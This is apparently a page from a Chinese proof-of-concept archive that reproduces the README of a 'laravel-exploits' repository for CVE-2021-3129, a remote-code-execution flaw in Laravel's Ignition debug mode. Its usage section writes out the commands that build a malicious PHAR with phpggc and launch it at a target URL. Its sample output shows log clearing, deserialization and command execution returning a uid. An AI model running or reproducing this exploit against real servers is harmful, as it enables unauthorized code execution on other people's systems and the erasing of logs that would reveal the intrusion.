关联漏洞
描述
Exploit for CVE-2021-3129
介绍
# laravel-exploits
Exploit for CVE-2021-3129
Details: https://www.ambionics.io/blog/laravel-debug-rce
# Usage
```bash
$ php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log
Logs cleared
Successfully converted to PHAR !
Phar deserialized
--------------------------
uid=1000(cf) gid=1000(cf) ...
--------------------------
Logs cleared
```
文件快照
[4.0K] /data/pocs/f54e21e81dd72a54a46d990c218244cd865780f4
├── [4.6K] laravel-ignition-rce.py
└── [ 527] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。